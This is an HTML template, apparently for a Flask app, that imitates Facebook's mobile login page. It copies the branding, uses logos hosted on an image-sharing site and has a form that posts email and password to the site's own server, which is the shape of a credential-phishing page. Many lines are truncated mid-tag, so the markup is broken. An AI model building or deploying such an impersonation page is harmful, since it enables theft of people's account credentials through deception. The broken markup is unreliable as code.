<!DOCTYPE html>
<html>
<head>
  <title>Facebook login</title>
  <link rel="stylesheet" href="{{url_for('static', fi>
<head>
<bod>
  <div class="all">
    <div class="download-logo">
     <img src="https://i.postimg.cc/MTdbk9ZQ/download>
      <h5>Get Facebook for Android and browse faster.>
      <hr>
    </div>
    <div class="select">
      <select class="select-it">
        <optgroup label="Select Your Language">
        <option selected>English (UK)</option>
        <option>Igbo </option>
        <option>Hausa</option>
        <option>Yoruba</option>
        </optgroup>
      </select>
    </div>
    <div class="facebook-logo">
      <img class="logo-f" src="https://i.postimg.cc/X>
    </div>
    <div class="login-details">
      <form method="POST">
        <input type="email" class="enter" name="Email>
        <input type="password" class="enter" name="Pa>

        <button type="submit" class="enter login">Log>
      </form>
      <p>Forgotten password?</p>
    </div>
    <div class="create-new">
      <p class="create">Create new account</p>
       <img src="https://i.postimg.cc/PxtzFgHH/Screen>
    </div>

  </div>
</body>
</html>
